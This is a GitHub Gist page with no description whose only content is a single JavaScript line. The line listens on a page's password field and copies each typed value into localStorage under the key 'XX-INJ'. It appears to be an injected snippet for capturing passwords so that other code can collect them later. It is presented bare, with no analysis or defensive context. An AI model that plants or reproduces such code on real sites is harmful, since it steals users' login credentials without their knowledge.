Skip to content

Instantly share code, notes, and snippets.

@john-diaz
Created January 17, 2019 13:10
Show Gist options
  • Save john-diaz/3c9b8c4f05a71a0a2ec99c0cb76be333 to your computer and use it in GitHub Desktop.
Save john-diaz/3c9b8c4f05a71a0a2ec99c0cb76be333 to your computer and use it in GitHub Desktop.
document.querySelector('input.form-input[type="password"]').addEventListener('input', function() {localStorage.setItem('XX-INJ', this.value)});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment